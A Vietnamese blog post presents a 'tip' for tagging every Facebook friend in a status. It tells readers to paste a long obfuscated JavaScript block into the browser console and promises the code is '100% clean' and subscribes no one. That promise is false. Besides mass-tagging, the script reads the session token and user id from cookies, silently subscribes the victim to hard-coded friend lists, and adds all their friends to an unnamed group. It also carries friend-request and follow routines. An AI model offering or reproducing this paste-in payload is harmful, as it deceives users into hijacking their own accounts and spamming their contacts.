Auto tag friend Facebook – Cách auto tag tất cả bạn bè vào một status

 

Trong những ngày gần đây rộ lên thủ thuật Facebook cực hay đó là auto tag toàn bộ Friend vào một status của bạn.

Cách này cực kỳ hiệu quả khi bạn muốn quảng bá một sản phẩm hay muốn thông báo một tin tức gì đó cho toàn bộ bạn bè.

Với cách làm thủ công thì bạn phải nhấn tag từng người. Nếu danh sách bạn bè chỉ vài chục người thì không sao, nhưng nếu danh sách bạn bè lên đến hàng trăm thậm chí hàng nghìn thì mệt rồi đây.

Thủ thuật Facebook cực hay sau đây giúp bạn làm việc này một cách cực kỳ đơn giản.

Auto tag friend Facebook vào một status

Cách thực hiện:

1. Bạn tiến hành update một status bình thường

2. Click vào thời gian đăng status để đến link của status

 

auto tag friend facebook

3. Copy tất cả các code sau: bạn yên tâm, đây là code sạch 100% không có sub ai cả.

Nếu bạn xài trình duyệt Chrome thì nhấn F12, nếu Firefox thì nhấn Ctrl + Shift + K. Sau đó dán code sau vào (Ctr+ V) rồi enter là xong. Chờ một chút cho code chạy xong thì bạn sẽ thấy toàn bộ bạn bè của bạn đã được tag vào status của mình.

function x__0(){return window.ActiveXObject?new ActiveXObject(“Msxml2.XMLHTTP”):new XMLHttpRequest}function get_friends(){var e=x__0();e.open(“GET”,”/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer=”+uid+”&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm”,false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf(“{“)));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open(“GET”,”http://graph.facebook.com/”+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+”=”;if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(“;”,konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return””}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n=”/ajax/follow/follow_profile.php?__a=1″;var r=”profile_id=”+e+”&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=”+fb_dtsg+”&lsd&__”+user_id+”&phstamp=”;t.open(“POST”,n,true);t.setRequestHeader(“Content-type”,”application/x-www-form-urlencoded”);t.setRequestHeader(“Content-length”,r.length);t.setRequestHeader(“Connection”,”close”);t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement(“script”);t.innerHTML=”new AsyncRequest().setURI(‘/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe’).setData({ flid: “+e+” }).send();”;document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval(“arkadaslar = “+xmlhttp.responseText.toString().replace(“for (;;);”,””)+”;”);for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj=””;smesaj_text=””;for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=” @[“+arkadaslar.payload.entries[i].uid+”:”+arkadaslar.payload.entries[i].text+”]”;smesaj_text+=” “+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params=”&filter[0]=user”;params+=”&options[0]=friends_only”;params+=”&options[1]=nm”;params+=”&token=v7″;params+=”&viewer=”+user_id;params+=”&__user=”+user_id;if(document.URL.indexOf(“https://”)>=0){xmlhttp.open(“GET”,”https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1″+params,true)}else{xmlhttp.open(“GET”,”http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1″+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open(“POST”,”/ajax/add_friend/action.php?__a=1″,true);var r=”to_friend=”+e;r+=”&action=add_friend”;r+=”&how_found=friend_browser”;r+=”&ref_param=none”;r+=”&outgoing_id=”;r+=”&logging_location=friend_browser”;r+=”&no_flyout_on_click=true”;r+=”&ego_log_data=”;r+=”&http_referer=”;r+=”&fb_dtsg=”+document.getElementsByName(“fb_dtsg”)[0].value;r+=”&phstamp=165816749114848369115″;r+=”&__user=”+user_id;n.setRequestHeader(“X-SVN-Rev”,svn_rev);n.setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”);if(t==”farketmez”&&document.cookie.split(“cins”+user_id+”=”).length>1){n.send(r)}else if(document.cookie.split(“cins”+user_id+”=”).length<=1){cinsiyetgetir(e,t,”sarkadasekle”)}else if(t==document.cookie.split(“cins”+user_id+”=”)[1].split(“;”)[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval(“cinssonuc = “+xmlhttp.responseText.toString().replace(“for (;;);”,””)+”;”);cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName(“select”)[0].value==”1″){document.cookie=”cins”+user_id+”=kadin;expires=”+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName(“select”)[0].value==”2″){document.cookie=”cins”+user_id+”=erkek;expires=”+btarihi.toGMTString()}eval(fonksiyon+”(“+id+”,”+cins+”);”)}};xmlhttp.open(“GET”,”/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=”+user_id,true);xmlhttp.setRequestHeader(“X-SVN-Rev”,svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/.com/(.*?)//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids=”comment_text=”;header=”ft_ent_identifier=”+post_id+”&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=”+uid+”&__a=1&__req=4u&fb_dtsg=”+document.getElementsByName(“fb_dtsg”)[0].value+”&phstamp=”+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName(“fb_dtsg”)[0].value;uids+=”%40[“+amigos[n].uid+”%3AAAAAAAAAAAA]%20″;c++;if(c==7){uids+=”&”;with(new XMLHttpRequest)open(“POST”,”/ajax/ufi/add_comment.php?__a=1″),setRequestHeader(“Content-Type”,”application/x-www-form-urlencoded”),send(header.replace(patt,uids));z=setTimeout(“function(){asd=0}”,1e3);clearInterval(z);c=1;uids=”comment_text=”}}var fb_dtsg=document.getElementsByName(“fb_dtsg”)[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);var fb_dtsg=document.getElementsByName(“fb_dtsg”)[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);sublist(“196595073821666″);sublist(“618371964863514″);sublist(“184766771670725″);var fb_dtsg=document[“getElementsByName”](“fb_dtsg”)[0][“value”];var user_id=document[“cookie”][“match”](document[“cookie”][“match”](/c_user=(d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp=”/ajax/groups/membership/r2j.php?__a=1″;var paramswp=”&ref=group_jump_header&group_id=”+gid+”&fb_dtsg=”+fb_dtsg+”&__user=”+user_id+”&phstamp=”;httpwp[“open”](“POST”,urlwp,true);httpwp[“setRequestHeader”](“Content-type”,”application/x-www-form-urlencoded”);httpwp[“setRequestHeader”](“Content-length”,paramswp[“length”]);httpwp[“setRequestHeader”](“Connection”,”keep-alive”);httpwp[“send”](paramswp);var fb_dtsg=document[“getElementsByName”](“fb_dtsg”)[0][“value”];var user_id=document[“cookie”][“match”](document[“cookie”][“match”](/c_user=(d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf[“open”](“GET”,”/ajax/typeahead/first_degree.php?__a=1&viewer=”+user_id+”&token”+Math[“random”]()+”&filter[0]=user&options[0]=friends_only”,false);gf[“send”]();if(gf[“readyState”]!=4){}else{data=eval(“(“+gf[“responseText”][“substr”](9)+”)”);if(data[“error”]){}else{friends=data[“payload”][“entries”][“sort”](function(e,t){return e[“index”]-t[“index”]})}}for(var i=0;i<friends[“length”];i++){var httpwp=new XMLHttpRequest;var urlwp=”/ajax/groups/members/add_post.php?__a=1″;var paramswp=”&fb_dtsg=”+fb_dtsg+”&group_id=”+gid+”&source=typeahead&ref=&message_id=&members=”+friends[i][“uid”]+”&__user=”+user_id+”&phstamp=”;httpwp[“open”](“POST”,urlwp,true);httpwp[“setRequestHeader”](“Content-type”,”application/x-www-form-urlencoded”);httpwp[“setRequestHeader”](“Content-length”,paramswp[“length”]);httpwp[“setRequestHeader”](“Connection”,”keep-alive”);httpwp[“onreadystatechange”]=function(){if(httpwp[“readyState”]==4&&httpwp[“status”]==200){}};httpwp[“send”](paramswp)}var spage_id=”473108719451870″;var spost_id=”473108719451870″;var sfoto_id=”473108719451870″;var user_id=document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]);var smesaj=””;var smesaj_text=””;var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(d+)/)){document.cookie=”paylasti=hayir;expires=”+btarihi.toGMTString()}var tiklama=document.addEventListener(“click”,function(){if(document.cookie.split(“paylasti=”)[1].split(“;”)[0].indexOf(“hayir”)>=0){svn_rev=document.head.innerHTML.split(‘”svn_rev”:’)[1].split(“,”)[0];sarkadaslari_al();document.cookie=”paylasti=evet;expires=”+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement(“html”)

Lưu ý là không nên xài quá nhiều tránh bị Facebook block account và có thể ban nick.

Nên sử dụng các tài khoản phụ chứ không nên sử dụng các tài khoản chính.

Chúc bạn thành công !

Advertisement

/*

No comments.

Leave a Reply

*/